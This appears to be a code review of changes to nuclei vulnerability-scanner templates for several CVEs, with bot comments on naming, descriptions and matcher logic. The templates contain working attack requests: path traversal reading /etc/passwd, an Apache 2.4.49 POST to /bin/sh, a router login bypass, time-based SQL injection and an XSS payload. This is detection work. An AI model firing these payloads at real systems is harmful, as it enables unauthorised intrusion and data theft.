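Review bot: The reference list contains the same dev.ofbiz.apache.org thread twice, once with `%40` and once with `@` in the URL; keep one of the two lists.apache.org entries. The description is a bare fragment, `Apache OFBiz has unsafe deserialization prior to 17.12.07 version`, while every other template in this commit uses a `description: |` block with full sentences — something like `Apache OFBiz before 17.12.07 is susceptible to unsafe deserialization via the SOAPService endpoint, which can lead to remote code execution.` A `remediation:` line would also fit, as other templates here carry one: `remediation: Upgrade to Apache OFBiz 17.12.07 or later.` The DNS `interactsh_protocol` matcher combined with the `errorMessage` body check is a sound, low-false-positive pairing.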
@ -1,15 +1,15 @@
|
|||
id: CVE-2021-3110
|
||||
|
||||
info:
|
||||
name: PrestaShop 1.7.7.0 SQL Injection
|
||||
name: PrestaShop 1.7.7.0 - SQL Injection
|
||||
author: Jaimin Gondaliya
|
||||
severity: critical
|
||||
description: |
|
||||
The store system in PrestaShop 1.7.7.0 allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter.
|
||||
PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3110
|
||||
- https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e
|
||||
- https://www.exploit-db.com/exploits/49410
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3110
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -33,3 +33,5 @@ requests:
|
|||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "average_grade")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
@ -1,11 +1,11 @@
|
|||
id: CVE-2021-33851
|
||||
|
||||
info:
|
||||
name: Customize Login Image < 3.5.3 - Cross-Site Scripting
|
||||
name: WordPress Customize Login Image <3.5.3 - Cross-Site Scripting
|
||||
author: 8authur
|
||||
severity: medium
|
||||
description: |
|
||||
A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin.
|
||||
WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
|
||||
- https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
|
||||
|
@ -62,3 +62,5 @@ requests:
|
|||
regex:
|
||||
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
|
||||
internal: true
|
||||
|
||||
# Enhanced by md on 2022/12/08
@ -1,11 +1,11 @@
|
|||
id: CVE-2021-35380
|
||||
|
||||
info:
|
||||
name: TermTalk Server 3.24.0.2 - Unauthenticated Arbitrary File Read
|
||||
name: TermTalk Server 3.24.0.2 - Local File Inclusion
|
||||
author: fxploit
|
||||
severity: high
|
||||
description: |
|
||||
A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download.
|
||||
TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.
|
||||
reference:
|
||||
- https://www.swascan.com/solari-di-udine/
|
||||
- https://www.exploit-db.com/exploits/50638
|
||||
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-35380
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2022,termtalk,lfi,unauth,lfr,edb
|
||||
tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -30,3 +30,5 @@ requests:
|
|||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2023/01/15
@ -1,15 +1,16 @@
|
|||
id: CVE-2021-40661
|
||||
|
||||
info:
|
||||
name: IND780 - Directory Traversal
|
||||
name: IND780 - Local File Inclusion
|
||||
author: For3stCo1d
|
||||
severity: high
|
||||
description: |
|
||||
A remote, unauthenticated, directory traversal vulnerability was identified within the web interface used by IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10'). It was possible to traverse the folders of the affected host by providing a traversal path to the 'webpage' parameter in AutoCE.ini This could allow a remote unauthenticated adversary to access additional files on the affected system. This could also allow the adversary to perform further enumeration against the affected host to identify the versions of the systems in use, in order to launch further attacks in future.
|
||||
IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10') is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the 'webpage' parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system.
|
||||
reference:
|
||||
- https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661
|
||||
- https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40661
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
|
@ -38,3 +39,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2023/01/15
@ -4,7 +4,8 @@ info:
|
|||
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
|
||||
author: daffainfo,666asd
|
||||
severity: high
|
||||
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|
||||
description: |
|
||||
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|
||||
reference:
|
||||
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
|
||||
|
@ -12,14 +13,13 @@ info:
|
|||
- https://twitter.com/ptswarm/status/1445376079548624899
|
||||
- https://twitter.com/h4x0r_dz/status/1445401960371429381
|
||||
- https://github.com/blasty/CVE-2021-41773
|
||||
remediation: Update to Apache HTTP Server 2.4.50 or later.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-41773
|
||||
cwe-id: CWE-22
|
||||
metadata:
|
||||
shodan-query: apache version:2.4.49
|
||||
shodan-query: Apache 2.4.49
|
||||
verified: "true"
|
||||
tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
|
||||
|
||||
|
@ -32,6 +32,10 @@ requests:
|
|||
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
@ -42,7 +46,6 @@ requests:
|
|||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
name: LFI
|
||||
regex:
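Review bot: The Shodan query in the metadata hunk is loosened from the structured `apache version:2.4.49` filter to the free-text `Apache 2.4.49`, which matches any banner or body that mentions that string rather than the parsed server version; unless the structured filter was observed to fail, `shodan-query: apache version:2.4.49` is the more precise scoping for a template that only applies to 2.4.49. The request hunks now hold three raw requests under `stop-at-first-match: true` / `matchers-condition: or`, so the order of the requests determines which check answers first — the current ordering, read-only checks before the POST, looks intentional and is worth a one-line comment so it is not reshuffled later. The matcher list continues below this hunk.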
@ -29,7 +29,7 @@ requests:
|
|||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("Â{{VSÂ}}")}}&__VIEWSTATEGENERATOR={{url_encode("Â{{VSGÂ}}")}}&__EVENTVALIDATION={{url_encode("Â{{EVÂ}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
|
||||
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("{{VS}}")}}&__VIEWSTATEGENERATOR={{url_encode("{{VSG}}")}}&__EVENTVALIDATION={{url_encode("{{EV}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
|
||||
|
||||
cookie-reuse: true
|
||||
extractors:
@ -0,0 +1,45 @@
|
|||
id: CVE-2021-42887
|
||||
|
||||
info:
|
||||
name: TOTOLINK - Authentication Bypass
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: |
|
||||
In TOTOLINK EX1200T V4.1.2cu.5215, an attacker can bypass login by sending a specific request through formLoginAuth.htm.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2021-42887
|
||||
- https://github.com/p1Kk/vuln/blob/main/totolink_ex1200t_login_bypass.md
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-42887
|
||||
cwe-id: CWE-287
|
||||
metadata:
|
||||
shodan-query: title:"TOTOLINK"
|
||||
tags: totolink,auth-bypass,cve,cve2021,router
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /login.htm HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_1
|
||||
words:
|
||||
- "TOTOLINK"
|
||||
|
||||
- type: word
|
||||
part: header_2
|
||||
words:
|
||||
- "Set-Cookie: SESSION_ID="
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
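Review bot: The name `TOTOLINK - Authentication Bypass` drops the model and firmware the description gives, unlike the `Product Version - Issue` form used throughout this commit; `name: TOTOLINK EX1200T V4.1.2cu.5215 - Authentication Bypass` would match it. Whether the `SESSION_ID` cookie is only issued after a successful `formLoginAuth.htm` login, rather than on every hit, is not evident from the template; if the device sets it unconditionally, the `header_2` word plus a 302 would also fire on patched firmware, so that should be confirmed against the linked write-up before `verified` is claimed. The final `- type: status` matcher has no explicit response selector, so it relies on nuclei's default for multi-request raw templates — presumably the last response, but stating that in a comment avoids guesswork.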
@ -1,15 +1,15 @@
|
|||
id: CVE-2021-43421
|
||||
|
||||
info:
|
||||
name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload
|
||||
name: Studio-42 elFinder <2.1.60 - Arbitrary File Upload
|
||||
author: akincibor
|
||||
severity: critical
|
||||
description: |
|
||||
A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
|
||||
Studio-42 elFinder 2.0.4 to 2.1.59 is vulnerable to unauthenticated file upload via connector.minimal.php which could allow a remote user to upload arbitrary files and execute PHP code.
|
||||
reference:
|
||||
- https://github.com/Studio-42/elFinder/issues/3429
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
|
||||
- https://twitter.com/infosec_90/status/1455180286354919425
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -50,3 +50,5 @@ requests:
|
|||
regex:
|
||||
- '"hash"\:"(.*?)"\,'
|
||||
internal: true
|
||||
|
||||
# Enhanced by mp on 2023/01/15
@ -1,11 +1,11 @@
|
|||
id: CVE-2021-43510
|
||||
|
||||
info:
|
||||
name: Simple Client Management System 1.0 - SQL Injection
|
||||
name: Sourcecodester Simple Client Management System 1.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the username field in login.php.
|
||||
Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://github.com/r4hn1/Simple-Client-Management-System-Exploit/blob/main/CVE-2021-43510
|
||||
- https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
|
||||
|
@ -43,3 +43,5 @@ requests:
|
|||
- 'contains(body_1, "{\"status\":\"success\"}")'
|
||||
- 'contains(body_2, "Welcome to Simple Client")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
@ -1,11 +1,11 @@
|
|||
id: CVE-2021-43734
|
||||
|
||||
info:
|
||||
name: kkFileview v4.0.0 - Directory Traversal
|
||||
name: kkFileview v4.0.0 - Local File Inclusion
|
||||
author: arafatansari
|
||||
severity: high
|
||||
description: |
|
||||
kkFileview v4.0.0 has arbitrary file read through a directory traversal vulnerability which may lead to sensitive file leak on related host.
|
||||
kkFileview v4.0.0 is vulnerable to local file inclusion which may lead to a sensitive file leak on a related host.
|
||||
reference:
|
||||
- https://github.com/kekingcn/kkFileView/issues/304
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-43734
|
||||
|
@ -17,19 +17,25 @@ info:
|
|||
metadata:
|
||||
shodan-query: http.html:"kkFileView"
|
||||
verified: "true"
|
||||
tags: cve,cve2021,kkfileview,traversal
|
||||
tags: cve,cve2021,kkfileview,traversal,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd"
|
||||
- "{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
- "root:.*:0:0:"
|
||||
- "for 16-bit app support"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2023/01/15
@ -1,11 +1,12 @@
|
|||
id: CVE-2021-44451
|
||||
|
||||
info:
|
||||
name: Apache Superset - Default Login
|
||||
name: Apache Superset <=1.3.2 - Default Login
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: |
|
||||
Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
|
||||
Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
remediation: Upgrade to Apache Superset 1.4.0 or higher.
|
||||
reference:
|
||||
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
|
||||
- https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb
|
||||
|
@ -66,3 +67,5 @@ requests:
|
|||
regex:
|
||||
- 'name="csrf_token" type="hidden" value="(.*)"'
|
||||
internal: true
|
||||
|
||||
# Enhanced by md on 2023/01/06
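Review bot: The rewritten description changes what the CVE is: the removed text (and the Apache thread in the references) describe CVE-2021-44451 as a leak of registered database-connection passwords to authenticated users, whereas the new text calls it "a default login vulnerability via registered database connections", which conflates the CVE with the default-credential probe the template actually performs. Keep the CVE's own wording and describe the template's check separately, e.g. `Apache Superset through 1.3.2 allowed registered database connection passwords to be leaked to authenticated users. This template checks for default credentials, which would grant an attacker that authenticated access.` The `remediation:` line added in this hunk is good; the request and extractor block lies between the two hunks.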
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0147
|
||||
|
||||
info:
|
||||
name: Cookie Information < 2.0.8 - Reflected Cross-Site Scripting
|
||||
name: WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting
|
||||
author: 8arthur
|
||||
severity: medium
|
||||
description: |
|
||||
The Cookie Information plugin does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue
|
||||
WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/2c735365-69c0-4652-b48e-c4a192dfe0d1
|
||||
- https://wordpress.org/plugins/wp-gdpr-compliance/
|
||||
|
@ -50,3 +50,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
@ -0,0 +1,45 @@
|
|||
id: CVE-2022-0234
|
||||
|
||||
info:
|
||||
name: WOOCS < 1.3.7.5 - Reflected Cross-Site Scripting
|
||||
author: Akincibor
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin does not sanitise and escape the woocs_in_order_currency parameter of the woocs_get_products_price_html AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response, leading to a Reflected Cross-Site Scripting
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/fd568a1f-bd51-41bb-960d-f8573b84527b
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0234
|
||||
- https://plugins.trac.wordpress.org/changeset/2659191
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-0234
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
google-dork: inurl:"wp-content/plugins/woocommerce-currency-switcher"
|
||||
verified: "true"
|
||||
tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,xss,woocs
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<img src onerror=alert(document.domain)>'
|
||||
- '"current_currency":'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
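Review bot: The new template's naming and description do not follow the conventions the rest of this commit applies: the name keeps a spaced `< 1.3.7.5` and "Reflected", where the other WordPress templates use `WordPress X <ver - Cross-Site Scripting`, and the description opens with "The plugin does not sanitise…" without naming the plugin or version. Suggest `name: WordPress WOOCS <1.3.7.5 - Cross-Site Scripting` and prefixing the description with `WordPress WOOCS plugin before 1.3.7.5 contains a cross-site scripting vulnerability.` before the existing detail. The reference list also lacks the NVD entry every other CVE template here carries, `https://nvd.nist.gov/vuln/detail/CVE-2022-0234`. The matchers themselves are fine: reflected marker plus `"current_currency":` plus `text/html` under `matchers-condition: and`.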
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0346
|
||||
|
||||
info:
|
||||
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting
|
||||
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution
|
||||
author: Akincibor,theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a vulnerability that can lead to cross-site scripting or remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
|
||||
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
|
||||
- https://wordpress.org/plugins/www-xml-sitemap-generator-org/
|
||||
|
@ -16,7 +16,7 @@ info:
|
|||
cve-id: CVE-2022-0346
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: true
|
||||
verified: "true"
|
||||
tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org
|
||||
|
||||
requests:
|
||||
|
@ -39,3 +39,5 @@ requests:
|
|||
part: body_2
|
||||
words:
|
||||
- "2ef3baa95802a4b646f2fc29075efe34"
|
||||
|
||||
# Enhanced by md on 2022/12/09
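Review bot: The name now advertises `Cross-Site Scripting/Remote Code Execution` while `severity: medium` and `cwe-id: CWE-79` stay unchanged in the next hunk; the RCE outcome is conditional on `allow_url_include` as the description says, so either the medium rating is deliberate and the name could stay XSS-only, or the severity should follow the name. A one-line decision in the PR would settle it. The request block is outside these hunks.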
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0349
|
||||
|
||||
info:
|
||||
name: NotificationX WordPress plugin < 2.3.9 - SQL Injection
|
||||
name: WordPress NotificationX <2.3.9 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
The NotificationX WordPress plugin before 2.3.9 does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection.
|
||||
WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a
|
||||
- https://wordpress.org/plugins/notificationx/advanced/
|
||||
|
@ -36,3 +36,5 @@ requests:
|
|||
- 'status_code == 200'
|
||||
- 'contains(body, "\"data\":{\"success\":true}")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0434
|
||||
|
||||
info:
|
||||
name: Page Views Count < 2.4.15 - Unauthenticated SQL Injection
|
||||
name: WordPress Page Views Count <2.4.15 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Unauthenticated SQL Injection in WordPress Page Views Count Plugin (versions < 2.4.15).
|
||||
WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability. It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1
|
||||
- https://wordpress.org/plugins/page-views-count/
|
||||
|
@ -38,3 +38,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2022-0784
|
||||
|
||||
info:
|
||||
name: WordPress Title Experiments Free <9.0.1 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress Title Experiments Free plugin before 9.0.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/6672b59f-14bc-4a22-9e0b-fcab4e01d97f
|
||||
- https://wordpress.org/plugins/wp-experiments-free/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0784
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0784
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,cve2022,wordpress
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "{\"images\":")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2023/01/06
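Review bot: The verdict rests on a fixed `duration>=6` with no control request, so a host or proxy that is merely slow can clear the six-second mark while also returning 200, text/html and the `{"images":` body that this endpoint presumably emits for any id, which yields a false positive. Adding a second request with the same action and a plain `id[]=1`, switching on `req-condition: true`, and requiring `duration_2<6` ties the delay to the payload rather than to the server; the `_1`/`_2` suffix pattern is the one the Order Listener template in this same commit already uses. I cannot see the plugin's response to a benign id, so whether the body check can stay on `_1` only should be confirmed against a test install.
```yaml
      # … unchanged: first (SLEEP) request …
    - |
      POST /wp-admin/admin-ajax.php HTTP/1.1
      Host: {{Hostname}}
      Content-Type: application/x-www-form-urlencoded

      action=wpex_titles&id[]=1

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'duration_2<6'
          - 'status_code_1 == 200'
          - 'contains(content_type_1, "text/html")'
          - 'contains(body_1, "{\"images\":")'
        condition: and
```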
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0785
|
||||
|
||||
info:
|
||||
name: Daily Prayer Time < 2022.03.01 - Unauthenticated SQLi
|
||||
name: WordPress Daily Prayer Time <2022.03.01 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Daily Prayer Time WordPress plugin before 2022.03.01 does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection.
|
||||
WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/e1e09f56-89a4-4d6f-907b-3fb2cb825255
|
||||
- https://wordpress.org/plugins/daily-prayer-time-for-mosques/
|
||||
|
@ -34,3 +34,5 @@ requests:
|
|||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "dptTimetable customStyles dptUserStyles")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
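Review bot: The new description in the first hunk has a doubled period, `contains a SQL injection vulnerability.. It does not sanitise`, which should read `contains a SQL injection vulnerability. It does not sanitize`. The same line keeps the British `sanitise` while the sibling templates rewritten in this commit standardise on `sanitize`, and it ends with `leading to SQL injection`, which only repeats the opening clause; the other rewrites close with the impact sentence (`An attacker can possibly obtain sensitive information ...`) instead. Aligning it keeps the generated markdown consistent across the WordPress SQLi templates.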
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2022-0786
|
||||
|
||||
info:
|
||||
name: WordPress KiviCare <2.3.9 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress KiviCare plugin before 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/53f493e9-273b-4349-8a59-f2207e8f8f30
|
||||
- https://wordpress.org/plugins/kivicare-clinic-management-system/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0786
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
